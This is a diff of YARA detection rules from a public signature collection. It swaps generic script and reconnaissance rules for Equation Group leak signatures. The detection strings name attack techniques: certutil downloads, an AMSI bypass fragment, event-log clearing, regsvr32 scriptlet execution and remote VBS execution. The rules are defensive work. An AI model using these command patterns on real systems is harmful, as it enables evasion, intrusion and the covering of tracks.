-		$op5 = { 83 7d 0c 00 75 05 8b 45 fc eb 76 6a 00 68 80 00 00 00 6a 01 6a 00 }
+		$s1 = "\\\\.\\pipe\\pcheap_reuse" fullword wide
+		$s2 = "**** FAILED TO DUPLICATE SOCKET ****" fullword wide
+		$s3 = "**** UNABLE TO DUPLICATE SOCKET TYPE %u ****" fullword wide
+		$s4 = "YOU CAN IGNORE ANY 'ServiceEntry returned error' messages after this..." fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( pe.imphash ( ) == "c36dcd2277c4a707a1a645d0f727542a" or 2 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 20KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_MAL_Revil_Kaseya_Jul21_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_PC_Level3_Gen : FILE
 {
 	meta:
-		description = "Detects malware used in the Kaseya supply chain attack"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "38b168d4-e761-544e-9859-eb155bbfe54a"
-		date = "2021-07-02"
+		id = "c479964c-3122-511d-9410-bc5d890f1489"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_revil_general.yar#L32-L57"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2581-L2600"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "44948d93c71370a9976f22bf78cd1af80359f2c9804ea7995791109785cfaf84"
+		logic_hash = "2ba0f5ada13bd8c71836f26e278c334fdbf2578eac189852befee7a81c07e169"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402"
-		hash2 = "8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd"
-		hash3 = "cc0cdc6a3d843e22c98170713abf1d6ae06e8b5e34ed06ac3159adafe85e3bd6"
-		hash4 = "d5ce6f36a06b0dc8ce8e7e2c9a53e66094c2adfc93cfac61dd09efe9ac45a75f"
-		hash5 = "d8353cfc5e696d3ae402c7c70565c1e7f31e49bcf74a6e12e5ab044f306b4b20"
-		hash6 = "e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c7dd49b98f399072c2619758455e8b11c6ee4694bb46b2b423fa89f39b185a97"
+		hash2 = "f6b723ef985dfc23202870f56452581a08ecbce85daf8dc7db4491adaa4f6e8f"
 
 	strings:
-		$opa1 = { 8b 4d fc 83 c1 01 89 4d fc 81 7d f0 ff 00 00 00 77 1? ba 01 00 00 00 6b c2 00 8b 4d 08 }
-		$opa2 = { 89 45 f0 8b 4d fc 83 c1 01 89 4d fc 81 7d f0 ff 00 00 00 77 1? ba 01 00 00 00 6b c2 00 }
-		$opa3 = { 83 c1 01 89 4d fc 81 7d f0 ff 00 00 00 77 1? ba 01 00 00 00 6b c2 00 8b 4d 08 0f b6 14 01 }
-		$opa4 = { 89 45 f4 8b 0d ?? ?0 07 10 89 4d f8 8b 15 ?? ?1 07 10 89 55 fc ff 75 fc ff 75 f8 ff 55 f4 }
-		$opb1 = { 18 00 10 bd 18 00 10 bd 18 00 10 0e 19 00 10 cc cc cc }
-		$opb2 = { 18 00 10 0e 19 00 10 cc cc cc cc 8b 44 24 04 }
-		$opb3 = { 10 c4 18 00 10 bd 18 00 10 bd 18 00 10 0e 19 00 10 cc cc }
+		$s1 = "S-%u-%u" fullword ascii
+		$s2 = "Copyright (C) Microsoft" fullword wide
+		$op1 = { 24 39 65 c6 44 24 3a 6c c6 44 24 3b 65 c6 44 24 }
+		$op2 = { 44 24 4e 41 88 5c 24 4f ff }
+		$op3 = { 44 24 3f 6e c6 44 24 40 45 c6 44 24 41 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 2 of ( $opa* ) or 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 3 of them )
 }
-rule SIGNATURE_BASE_Recon_Commands_Windows_Gen1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Put_Implant9X : FILE
 {
 	meta:
-		description = "Detects a set of reconnaissance commands on Windows systems"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bc95265c-780d-5451-bd12-d14495877e46"
-		date = "2017-07-10"
+		id = "73cafd51-8b0d-59e3-966d-2f5de65953a7"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/MSJCxP"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_recon_indicators.yar#L12-L50"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2602-L2618"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "36beb09c428949140cb007c1022c385c9a1ae4eea8c1f1a419f96b36b8030c7c"
-		score = 60
+		logic_hash = "e79a59e400aac544dc1160d5898e3053f88f7d5bc142440177526187650484e7"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8fcc98d63504bbacdeba0c1e8df82f7c4182febdf9b08c578d1195b72d7e3d5f"
 
 	strings:
-		$s1 = "netstat -an" ascii
-		$s2 = "net view" ascii fullword
-		$s3 = "net user" ascii fullword
-		$s4 = "whoami" ascii
-		$s5 = "tasklist /v" ascii
-		$s6 = "systeminfo" ascii
-		$s7 = "net localgroup administrators" ascii
-		$s8 = "net user administrator" ascii
-		$s9 = "regedit -e " ascii
-		$s10 = "tasklist /svc" ascii
-		$s11 = "regsvr32 /s /u " ascii
-		$s12 = "CreateObject(\"WScript.Shell\").RegWrite" ascii
-		$s13 = "bitsadmin /rawreturn /transfer getfile" ascii
-		$s14 = "wmic qfe list full" ascii
-		$s15 = "schtasks.exe /create " ascii nocase
-		$s16 = "wmic share get" ascii
-		$s17 = "wmic nteventlog get" ascii
-		$s18 = "wevtutil cl " ascii
-		$s19 = "sc query type= service" ascii
-		$s20 = "arp -a " ascii
-		$fp1 = "avdapp.dll" fullword wide
-		$fp2 = "keyword.command.batchfile" ascii
-		$fp3 = ".sublime-settings" ascii
+		$s1 = "3&3.3<3A3F3K3V3c3m3" fullword ascii
+		$op1 = { c9 c2 08 00 b8 72 1c 00 68 e8 c9 fb ff ff 51 56 }
+		$op2 = { 40 1b c9 23 c8 03 c8 38 5d 14 74 05 6a 03 58 eb }
 
 	condition:
-		filesize < 1000KB and 4 of them and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x5a4d and filesize < 20KB and 2 of them )
 }
-rule SIGNATURE_BASE_SUSP_Recon_Outputs_Jun20_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Promiscdetect_Safe : FILE
 {
 	meta:
-		description = "Detects outputs of many different commands often used for reconnaissance purposes"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ec3759aa-212f-52ce-9f38-636accd35749"
-		date = "2020-06-04"
+		id = "d6103861-b332-5c21-8408-76b512012689"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/cycldek-bridging-the-air-gap/97157/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_recon_indicators.yar#L52-L74"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2620-L2635"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "652b28bfb45a11eaaee198c76560c1f55edc5b32c5394e606bb5426551260f24"
-		score = 60
+		logic_hash = "4b8c2e9a00af4e6aed7f603dee0439357e3389180fbd2e83d6809e76dc7d0428"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6070d8199061870387bb7796fb8ccccc4d6bafed6718cbc3a02a60c6dc1af847"
 
 	strings:
-		$s1 = ". . . . : Yes" ascii
-		$s2 = "with 32 bytes of data:" ascii
-		$s3 = "ff-ff-ff-ff-ff-ff     static" ascii
-		$s4 = "  TCP    0.0.0.0:445" ascii
-		$s5 = "System Idle Process" ascii
+		$s1 = "running on this computer!" fullword ascii
+		$s2 = "- Promiscuous (capture all packets on the network)" fullword ascii
+		$s3 = "Active filter for the adapter:" fullword ascii
 
 	condition:
-		filesize < 150KB and 4 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
 }
-rule SIGNATURE_BASE_PS_AMSI_Bypass : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Packetscan_Implant : FILE
 {
 	meta:
-		description = "Detects PowerShell AMSI Bypass"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "31ab8932-4c74-5251-a044-3fcc0aa159f4"
-		date = "2017-07-19"
+		id = "e49695d9-15ae-53a6-955c-c68402e241a2"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_scripts.yar#L4-L17"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2637-L2652"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "87188c6cbb7d89c25faafb297a7c0e52321c661c84cdefd5604785c687190fcd"
-		score = 65
+		logic_hash = "aa2106d2aad3e81c864181c851574f76f48cd4fe48bb3327135f2956d271dfde"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9b97cac66d73a9d268a15e47f84b3968b1f7d3d6b68302775d27b99a56fbb75a"
 
 	strings:
-		$s1 = ".GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static')." ascii nocase
+		$op0 = { e9 ef fe ff ff ff b5 c0 ef ff ff 8d 85 c8 ef ff }
+		$op1 = { c9 c2 04 00 b8 34 26 00 68 e8 40 05 00 00 51 56 }
+		$op2 = { e9 0b ff ff ff 8b 45 10 8d 4d c0 89 58 08 c6 45 }
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them )
 }
-rule SIGNATURE_BASE_JS_Suspicious_Obfuscation_Dropbox
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Setports : FILE
 {
 	meta:
-		description = "Detects PowerShell AMSI Bypass"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9b6b288d-3a15-5267-bbb1-885febf4df78"
-		date = "2017-07-19"
+		id = "6dc67951-714e-57d9-b34a-0006348b6b10"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/ItsReallyNick/status/887705105239343104"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_scripts.yar#L19-L33"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2654-L2668"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "19d1dd25c4a5e18dca131709a64c3537278754ec9d67b0bb49bde9b1493d3dc7"
-		score = 70
+		logic_hash = "b2c61f6ca2d59d5e596e7c5c87ed3476d957763daeaf41e6f356bacf26415faf"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "722d3cf03908629bc947c4cca7ce3d6b80590a04616f9df8f05c02de2d482fb2"
 
 	strings:
-		$x1 = "j\"+\"a\"+\"v\"+\"a\"+\"s\"+\"c\"+\"r\"+\"i\"+\"p\"+\"t\""
-		$x2 = "script:https://www.dropbox.com" ascii
+		$s1 = "USAGE: SetPorts <input file> <output file> <version> <port1> [port2] [port3] [port4] [port5]" fullword ascii
+		$s2 = "Valid versions are:  1 = PC 1.2   2 = PC 1.2 (24 hour)" fullword ascii
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
 }
-rule SIGNATURE_BASE_JS_Suspicious_MSHTA_Bypass
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Grdo_Filescanner_Implant : FILE
 {
 	meta:
-		description = "Detects MSHTA Bypass"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b2ddca78-c19a-5bb6-a1c9-4413e637ab1d"
-		date = "2017-07-19"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/ItsReallyNick/status/887705105239343104"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_scripts.yar#L35-L50"
+		id = "79a3cc02-0cda-59e2-8698-29a6cb0a3061"
+		date = "2017-04-15"
+		modified = "2023-01-06"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2670-L2686"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "df68cac0da19c5705353f26fc3f2a99556b7230f9d4f52e7a2e35cb48997b699"
-		score = 70
+		logic_hash = "ae88d27f41dd4888c445c654c919b3862fe3fc8c92aef816b22b2fb408a49cce"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8d2e43567e1360714c4271b75c21a940f6b26a789aa0fce30c6478ae4ac587e4"
 
 	strings:
-		$s1 = "mshtml,RunHTMLApplication" ascii
-		$s2 = "new ActiveXObject(\"WScript.Shell\").Run(" ascii
-		$s3 = "/c start mshta j" ascii nocase
+		$s1 = "system32\\winsrv.dll" fullword wide
+		$s2 = "raw_open CreateFile error" fullword ascii
+		$s3 = "\\dllcache\\" wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them )
 }
-rule SIGNATURE_BASE_Javascript_Run_Suspicious
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Msgks_Mskgu : FILE
 {
 	meta:
-		description = "Detects a suspicious Javascript Run command"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "87f98ead-3052-5777-8877-574619173aaa"
-		date = "2017-08-23"
+		id = "1692848d-a8db-5c11-9dc4-f1b0c45a78c3"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/craiu/status/900314063560998912"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_scripts.yar#L52-L66"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2688-L2704"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "39d2292d3749c63780dc7ca7a2414ba02e2b0e1edec7ec6a16b42aba2c44c23a"
-		score = 60
+		logic_hash = "d3a230d29997ab247db2b7a2a0f369206513a98c16f744e2fb1fca6495d5e36b"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7b4986aee8f5c4dca255431902907b36408f528f6c0f7d7fa21f079fa0a42e09"
+		hash2 = "ef906b8a8ad9dca7407e0a467b32d7f7cf32814210964be2bfb5b0e6d2ca1998"
 
 	strings:
-		$s1 = "w = new ActiveXObject(" ascii
-		$s2 = " w.Run(r);" fullword ascii
+		$op1 = { f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 }
+		$op2 = { 36 c6 45 e6 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 }
+		$op3 = { c6 45 e8 65 c6 45 e9 70 c6 45 ea 74 c6 45 eb 5f }
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_Certutil_Decode_OR_Download : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Ifconfig_Target : FILE
 {
 	meta:
-		description = "Certutil Decode"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "63bdefd2-225a-56d5-b615-5e236c97f050"
-		date = "2017-08-29"
-		modified = "2023-10-19"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_scripts.yar#L70-L93"
+		id = "db8ec377-a9f6-5d75-a123-aa0365d98065"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2706-L2722"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5640dcfedc028cc40b0376d328758b504eb1ff860da94648b435eadb760d9724"
-		score = 40
+		logic_hash = "e88f589bed7830a1be81c85c9eb77b7f5c14bef2f0f1b3be6293aa9c5e870278"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1ebfc0ce7139db43ddacf4a9af2cb83a407d3d1221931d359ee40588cfd0d02b"
 
 	strings:
-		$a1 = "certutil -decode " ascii wide
-		$a2 = "certutil  -decode " ascii wide
-		$a3 = "certutil.exe -decode " ascii wide
-		$a4 = "certutil.exe  -decode " ascii wide
-		$a5 = "certutil -urlcache -split -f http" ascii wide
-		$a6 = "certutil.exe -urlcache -split -f http" ascii wide
-		$fp_msi = { 52 00 6F 00 6F 00 74 00 20 00 45 00 6E 00 74 00 72 00 79 }
+		$s1 = "SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\%hs" fullword wide
+		$op1 = { 0f be 37 85 f6 0f 85 4e ff ff ff 45 85 ed 74 21 }
+		$op2 = { 4c 8d 44 24 34 48 8d 57 08 41 8d 49 07 e8 a6 4b }
 
 	condition:
-		filesize < 700KB and 1 of ( $a* ) and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
 }
-rule SIGNATURE_BASE_Suspicious_JS_Script_Content : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Diba_Target : FILE
 {
 	meta:
-		description = "Detects suspicious statements in JavaScript files"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6a547aa5-c58c-5559-9d3f-3f0d541eafd4"
-		date = "2017-12-02"
+		id = "c6ae85b6-0670-558c-9ce5-64bd5822f35b"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "Research on Leviathan https://goo.gl/MZ7dRg"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_scripts.yar#L95-L112"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2724-L2739"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1dbc1a266d710a70a77c81d5b872d0d324423250a9f34455faef53ac4c41b5f2"
-		score = 70
+		logic_hash = "3ee7a1284e2abd0282606c22b9112bd1af536e5fd48ef27e8d9216da8e1fb1c5"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fc0fad39b461eb1cfc6be57932993fcea94fca650564271d1b74dd850c81602f"
+		hash1 = "ffff3526ed0d550108e97284523566392af8523bbddb5f212df12ef61eaad3e6"
 
 	strings:
-		$x1 = "new ActiveXObject('WScript.Shell')).Run('cmd /c " ascii
-		$x2 = ".Run('regsvr32 /s /u /i:" ascii
-		$x3 = "new ActiveXObject('WScript.Shell')).Run('regsvr32 /s" fullword ascii
-		$x4 = "args='/s /u /i:" ascii
+		$op1 = { 41 5a 41 59 41 58 5f 5e 5d 5a 59 5b 58 48 83 c4 }
+		$op2 = { f9 48 03 fa 48 33 c0 8a 01 49 03 c1 49 f7 e0 88 }
+		$op3 = { 01 41 f6 e0 49 03 c1 88 01 48 33 }
 
 	condition:
-		( filesize < 10KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_Universal_Exploit_Strings : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Dsz_Implant : FILE
 {
 	meta:
-		description = "Detects a group of strings often used in exploit codes"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4b3a9eec-5f7c-579c-9719-fe23cc291aee"
-		date = "2017-12-02"
+		id = "febc8654-7dc3-5c8b-a53c-f8d7dc29b14b"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "not set"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_scripts.yar#L114-L131"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2741-L2755"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6436a1cf6d0acc3162ec99c95ef20b3e6dd110c77d5a0b26ac790551316c0a69"
-		score = 50
+		logic_hash = "3d76131a42aed642a8c54076544488a8d24ec16416469813324541d72e30101b"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9b07dacf8a45218ede6d64327c38478640ff17d0f1e525bd392c002e49fe3629"
+		hash1 = "fbe103fac45abe4e3638055a3cac5e7009166f626cf2d3049fb46f3b53c1057f"
+		hash2 = "ad1dddd11b664b7c3ad6108178a8dade0a6d9795358c4a7cedbe789c62016670"
 
 	strings:
-		$s1 = "Exploit" fullword ascii
-		$s2 = "Payload" fullword ascii
-		$s3 = "CVE-201" ascii
-		$s4 = "bindshell"
+		$s1 = "%02u:%02u:%02u.%03u-%4u: " fullword ascii
 
 	condition:
-		( filesize < 2KB and 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
 }
-rule SIGNATURE_BASE_VBS_Obfuscated_Mal_Feb18_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Genkey : FILE
 {
 	meta:
-		description = "Detects malicious obfuscated VBS observed in February 2018"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "39ea10e5-9dea-5cc8-8388-15378fcbab60"
-		date = "2018-02-12"
+		id = "54e15017-a2f7-5135-af88-b13ea5866c5f"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/zPsn83"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_scripts.yar#L133-L155"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2757-L2770"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0bbd388a3103744df2434956c2b7ac12dacd72f9041b4cc014d31eec4115aedd"
+		logic_hash = "cdaa33645d0ea614891fc0579937e983b8b4f6c4830191518dc8272791dcc8df"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "06960cb721609fe5a857fe9ca3696a84baba88d06c20920370ddba1b0952a8ab"
-		hash2 = "c5c0e28093e133d03c3806da0061a35776eed47d351e817709d2235b95d3a036"
-		hash3 = "e1765a2b10e2ff10235762b9c65e9f5a4b3b47d292933f1a710e241fe0417a74"
+		hash1 = "b6f100b21da4f7e3927b03b8b5f0c595703b769d5698c835972ca0c81699ff71"
 
 	strings:
-		$x1 = "A( Array( (1* 2^1 )+" ascii
-		$x2 = ".addcode(A( Array(" ascii
-		$x3 = "false:AA.send:Execute(AA.responsetext):end" ascii
-		$x4 = "& A( Array(  (1* 2^1 )+" ascii
-		$s1 = ".SYSTEMTYPE:NEXT:IF (UCASE(" ascii
-		$s2 = "A = STR:next:end function" ascii
-		$s3 = "&WSCRIPT.SCRIPTFULLNAME&CHR" fullword ascii
+		$x1 = "* PrivateEncrypt -> PublicDecrypt FAILED" fullword ascii
 
 	condition:
-		filesize < 600KB and ( 1 of ( $x* ) or 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
 }
-rule SIGNATURE_BASE_Mywscript_Compiledscript : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Wmi_Implant : FILE
 {
 	meta:
-		description = "Detects a scripte with default name Mywscript compiled with Script2Exe (can also be a McAfee tool https://community.mcafee.com/docs/DOC-4124)"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a0480a8a-5a7e-5829-851b-7301cfc9da60"
-		date = "2017-07-27"
+		id = "e058d2cc-b963-55bc-9bdd-468f64fe8e6f"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_mywscript_dropper.yar#L10-L26"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2772-L2785"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5619de9589e3d34026bf4ec223f2c6b94fcb7362c8f3c26f7582030cfc4385cf"
-		score = 65
+		logic_hash = "69754b6f26292aa1a457c71d079d934ce75794624c38e9d19c84ceb77a5fb26d"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "515f5188ba6d039b8c38f60d3d868fa9c9726e144f593066490c7c97bf5090c8"
+		hash1 = "de08d6c382faaae2b4b41b448b26d82d04a8f25375c712c12013cb0fac3bc704"
 
 	strings:
-		$x1 = "C:\\Projets\\vbsedit_source\\script2exe\\Release\\mywscript.pdb" fullword ascii
-		$s1 = "mywscript2" fullword wide
-		$s2 = "MYWSCRIPT2" fullword wide
+		$x1 = "SELECT ProcessId,Description,ExecutablePath FROM Win32_Process" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and ( $x1 or 2 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them )
 }
-
-rule SIGNATURE_BASE_SUSP_Unsigned_OSPPSVC : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Clocksvc : FILE
 {
 	meta:
-		description = "Detects a suspicious unsigned office software protection platform service binary"
+		description = "Detects EquationGroup Tool - April Leak"
